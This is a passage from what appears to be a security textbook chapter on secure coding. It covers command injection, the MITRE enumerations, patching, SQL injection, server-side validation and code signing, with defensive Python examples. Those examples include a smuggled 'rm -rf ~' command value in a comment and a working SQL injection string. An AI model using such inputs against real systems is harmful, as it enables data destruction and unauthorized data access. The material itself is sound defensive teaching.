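print(accept_upload("photo.jpg", b"MZ\x90\x00"))  # False: Windows executable header
```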

Locally Shared Objects

Locally shared objects (LSOs) are pieces of data that are stored on a user’s machine to save information from an application, such as a game. Frequently these are cookies used by Adobe Flash, called Flash cookies, which can store information such as user preferences. Because these can be manipulated outside of the application, they can represent a security or privacy threat.


Adobe Flash was retired at the end of 2020 and no longer functions. Locally shared objects still exist and still present risk.

Client-Side Attacks

The web browser has become the major application for users to engage resources across the Web. Web-based attacks are covered in detail in Chapter 17.

Arbitrary/Remote Code Execution

One of the risks involved in taking user input and using it to create a command to be executed on a system is arbitrary or remote code execution. This attack involves an attacker preparing an input statement that changes the form or function of a prepared statement. A form of command injection, this attack can allow a user to insert arbitrary code and then remotely execute it on a system. This is a form of input validation failure because users should not have the ability to change the way a program interacts with the host OS outside of a set of defined and approved methods.
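
The safer pattern for commands built from user input can be sketched as follows: validate the input against a strict allowlist, then hand the program an argument list rather than a shell command string. This minimal sketch assumes a hypothetical feature that lists a user-named file and only builds the argument vector. Passing such a list to Python's `subprocess.run` (whose `shell` parameter defaults to `False`) means no shell ever parses the input, so characters like `;` or `$(...)` have no special meaning.

```python
import re
from typing import List

# Hypothetical allowlist: plain file names of letters, digits, dot, dash, underscore.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


def build_unsafe_command(filename: str) -> str:
    # DON'T: user input is pasted into text that a shell would interpret,
    # so "x; rm -rf ~" would run a second, attacker-chosen command.
    return "ls -l " + filename


def build_safe_command(filename: str) -> List[str]:
    """Return an argument list for subprocess.run(), or reject the input."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected file name: {filename!r}")
    # "--" tells ls that everything after it is a file name, never an option.
    return ["ls", "-l", "--", filename]


print(build_safe_command("report.txt"))  # ['ls', '-l', '--', 'report.txt']
```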

Open Vulnerability and Assessment Language

MITRE has done extensive research into software vulnerabilities. To enable collaboration between the many different parties involved in software development and maintenance, MITRE has developed a taxonomy of vulnerabilities, the Common Vulnerabilities and Exposures list, as mentioned earlier in the chapter. This is just one of the many related enumerations that MITRE has developed in an effort to enable machine-readable data exchanges that facilitate system management across large enterprises. The CVE list led to efforts such as the development of the Open Vulnerability and Assessment Language (OVAL). OVAL comprises two main elements: an XML-based machine-readable language for describing vulnerabilities and a repository (see http://oval.mitre.org).


CVE provides security personnel with a common language to use when discussing vulnerabilities. If one is discussing a specific vulnerability in the Flash object that allows arbitrary code execution, then referring to it by its identifier, CVE-2005-2628, records the specifics of the vulnerability and ensures everyone is discussing the same problem.
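
Because CVE identifiers follow a fixed syntax ("CVE-", a four-digit year, "-", and a sequence number of four or more digits), tools can reliably pick them out of reports and recognize when two sources describe the same problem. The following is a minimal sketch, assuming the reports are plain text; the two sample report strings are made up for illustration.

```python
import re
from typing import List

# CVE ID syntax: "CVE-", a four-digit year, "-", then four or more digits.
CVE_PATTERN = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)


def extract_cve_ids(text: str) -> List[str]:
    """Return the distinct CVE IDs mentioned in text, upper-cased and sorted."""
    return sorted({match.group(0).upper() for match in CVE_PATTERN.finditer(text)})


scanner = "Finding 7: Flash player affected by cve-2005-2628."
advisory = "Upgrade Flash to address CVE-2005-2628 (arbitrary code execution)."
print(extract_cve_ids(scanner + " " + advisory))  # ['CVE-2005-2628']
```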

In addition to the CVE and OVAL efforts, MITRE has developed a wide range of enumerations and standards designed to ease the automation of security management at the lowest levels across an enterprise. Additional efforts include the following:

- Common Attack Pattern Enumeration and Classification (CAPEC)
- Extensible Configuration Checklist Description Format (XCCDF)
- Security Content Automation Protocol (SCAP)
- Common Configuration Enumeration (CCE)
- Common Platform Enumeration (CPE)
- Common Weakness Enumeration (CWE)
- Common Event Expression (CEE)
- Common Result Format (CRF)

The Common Weakness Enumeration is important for secure development in that it enumerates common patterns of development that lead to weaknesses and potential vulnerabilities. Additional information can be obtained from the MITRE Making Security Measurable website at http://measurablesecurity.mitre.org.

Application Hardening


Application hardening works in the same fashion as system hardening (discussed in Chapter 14). The first step is the removal of unnecessary components or options. The second step is the proper configuration of the system as it is implemented. Every update or patch can lead to changes to these conditions, and they should be confirmed after every update.

The primary tools used to ensure a hardened system are a secure application configuration baseline and a patch management process. When properly employed, these tools keep the system in its most secure attainable state.

Application Configuration Baseline

A baseline is the set of proper settings for a computer system. An application configuration baseline outlines the proper settings and configurations for an application or set of applications. These settings include many elements, from application settings to security settings. Protection of the settings is crucial, and the most common mechanisms used to protect them include access control lists and protected directories. The documentation of the desired settings is an important security document, assisting administrators in ensuring that proper configurations are maintained across updates.
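
Checking a system against its documented baseline, for example after each update, can be automated. The following is a minimal sketch, assuming the application's settings can be read into a simple name-to-value mapping; the setting names and values are hypothetical.

```python
from typing import Dict, List

# Hypothetical documented baseline: setting name -> required value.
BASELINE: Dict[str, str] = {
    "tls_min_version": "1.2",
    "debug_mode": "off",
    "admin_console": "disabled",
}


def find_drift(current: Dict[str, str], baseline: Dict[str, str] = BASELINE) -> List[str]:
    """Report every baseline setting that is missing or changed in the current config."""
    problems = []
    for key, required in baseline.items():
        actual = current.get(key)
        if actual is None:
            problems.append(f"{key}: missing (baseline requires {required!r})")
        elif actual != required:
            problems.append(f"{key}: {actual!r} differs from baseline {required!r}")
    return problems


# Example: an update silently re-enabled debug mode.
after_update = {"tls_min_version": "1.2", "debug_mode": "on", "admin_console": "disabled"}
print(find_drift(after_update))  # ["debug_mode: 'on' differs from baseline 'off'"]
```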

Application Patch Management

Application patch management is a fundamental component of application and system hardening. The objective is to be running the most secure version of an application, and with few exceptions, that would be the most current version of software, including patches. Most updates and patches include fixes for security issues and close vulnerabilities. Current patching is a requirement of many compliance schemes as well.

Patching does not always go as planned, and some patches may result in problems in production systems. A formal system of patch management is needed to test and implement patches in a change-controlled manner.
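
Part of a patch management process is determining whether an installed version predates the first release that fixes a known issue. The following is a minimal sketch, assuming purely numeric dotted version strings with the same number of components (real versioning schemes with pre-release tags need a dedicated parser). Comparing such strings as text gives wrong answers, which is why the parts are converted to integers first.

```python
from typing import Tuple


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn a dotted numeric version such as '2.4.58' into (2, 4, 58)."""
    return tuple(int(part) for part in text.split("."))


def needs_patch(installed: str, first_fixed: str) -> bool:
    """True if the installed version is older than the first fixed release."""
    return parse_version(installed) < parse_version(first_fixed)


print(needs_patch("2.4.9", "2.4.58"))  # True: 9 < 58 when compared as numbers
print("2.4.9" < "2.4.58")              # False: text comparison gets this wrong
```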


Patch management might be referred to as update management, configuration management, or change management. Although these terms are not strictly synonyms, they might be used interchangeably on the exam.

NoSQL Databases vs. SQL Databases

Current programming trends include topics such as whether to use SQL databases or NoSQL databases. SQL databases are those that use Structured Query Language to manipulate items that are referenced in a relational manner in the form of tables. NoSQL refers to data stores that employ neither SQL nor relational table structures. Each system has its strengths and weaknesses, and both can be used for a wide range of data storage needs.

SQL databases are by far the most common, with implementations by IBM, Microsoft, and Oracle being the major players. NoSQL databases tend to be custom-built using low-level languages and lack many of the standards of existing databases. This has not stopped the growth of NoSQL databases in large-scale, well-resourced environments.

The key to accessing data securely lies in the correct use of programming structures and frameworks that abstract the access process. Methods such as inline SQL generation coupled with input validation errors are recipes for disaster in the form of SQL injection attacks.
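
The difference between inline SQL generation and a properly abstracted query can be shown with Python's built-in `sqlite3` module. This minimal sketch uses a hypothetical in-memory `users` table. The `?` placeholder makes the driver treat the input strictly as data, while string concatenation lets the input rewrite the query.

```python
import sqlite3
from typing import List, Tuple


def make_demo_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)", [("alice", "admin"), ("bob", "user")]
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # DON'T: inline SQL generation; the input becomes part of the query text.
    query = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # DO: a parameterized query; the driver binds name as a value, never as SQL.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


conn = make_demo_db()
attack = "nobody' OR '1'='1"
print(len(find_user_unsafe(conn, attack)))  # 2: every row leaks
print(find_user_safe(conn, attack))         # []: no user has that literal name
```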

Server-Side vs. Client-Side Validation

In a modern client/server environment, data can be checked for compliance with input/output requirements either on the server or on the client. There are advantages to verifying data elements on a client before sending them to the server (namely, efficiency). Doing checks on the client saves a round trip, and its delays, before a user can be alerted to a problem. This can improve the usability of software interfaces.

The client is not a suitable place to perform any critical value checks or security checks. The reasons for this are twofold. First, the client can change anything after the check. Second, the data can be altered while in transit or at an intermediary proxy. For all checks that are essential, either for business reasons or for security, the verification steps should be performed on the server side, where the data is free from unauthorized alterations. Input validation checks can be safely performed only on the server side.

All input validation should be performed on the server side of the client/server relationship, where it is free from outside influence and change. This is the only way to guarantee appropriate screening of inputs.
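
A server-side re-check can be sketched as follows. This minimal sketch assumes a hypothetical order form with `item` and `quantity` fields and a server-side price list. Whatever the client's own checks did, the server validates every field again and ignores any price the client sends.

```python
from typing import Any, Dict

# Hypothetical server-side catalog; only these prices are trusted.
CATALOG_PRICES_CENTS: Dict[str, int] = {"widget": 1999, "gadget": 4500}
MAX_QUANTITY = 100


def validate_order(payload: Dict[str, Any]) -> int:
    """Re-validate an order on the server and return its total in cents.

    Client-side checks may already have run, but the payload could have been
    altered afterward or in transit, so every field is checked again here.
    """
    item = payload.get("item")
    if not isinstance(item, str) or item not in CATALOG_PRICES_CENTS:
        raise ValueError("unknown item")
    quantity = payload.get("quantity")
    # bool is a subclass of int in Python, so rule it out explicitly.
    if not isinstance(quantity, int) or isinstance(quantity, bool):
        raise ValueError("quantity must be an integer")
    if not 1 <= quantity <= MAX_QUANTITY:
        raise ValueError("quantity out of range")
    # Any client-supplied "price" field is deliberately ignored.
    return CATALOG_PRICES_CENTS[item] * quantity


print(validate_order({"item": "widget", "quantity": 2, "price": 1}))  # 3998
```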

Code Signing

An important factor in ensuring that software is genuine and has not been altered is a method of testing the software integrity. With software being updated across the Web, how can one be sure that the code received is genuine and has not been tampered with? The answer comes from the application of digital signatures to the code, a process known as code signing.

Code signing involves applying a digital signature to code, providing a mechanism where the end user can verify the code integrity. In addition to verifying the integrity of the code, digital signatures provide evidence as to the source of the software. Code signing rests upon the established public key infrastructure. To use code signing, a developer needs a key pair. For the public key to be recognized by the end user, it must be bound to a certificate signed by a recognized certificate authority.

Encryption

Encryption is one area where secure coding has some unique guidance: “never roll your own crypto.” This means not only that you should not write your own cryptographic algorithms but also that you should not implement standard algorithms yourself. Vetted, proven cryptographic libraries exist for all major languages, and the use of these libraries is considered best practice. There are a variety of interrelated rationales for this directive, but the simple explanation is that crypto is almost impossible to invent and very hard to implement correctly. This means that to have usable, secure encryption in your program, you need to adopt proven algorithms and use proven codebases.

Obfuscation/Camouflage

Obfuscation or camouflage is the hiding of obvious meaning from observation. While obscurity is not considered adequate security under most circumstances, adding obfuscation or camouflage to a system to make it harder for an attacker to understand and exploit is a good thing. Numbering your e-mail servers email1, email2, email3, and so on tells an attacker what namespace to explore. Removing or hiding these hints makes the work harder and offers another layer of protection.

This works well for data names and other elements that must be exposed to the outside. Where it does not work well is in the construction of code. Obfuscated code, or code that is hard or even nearly impossible to read, is a ticking time bomb. The day will come when someone will need to read the code, figure out how it works so it can be modified, or determine why it is not working. If programmers have issues reading and understanding the code, including how it functions and what it is supposed to do, how can they contribute to its maintenance?

Code Reuse/Dead Code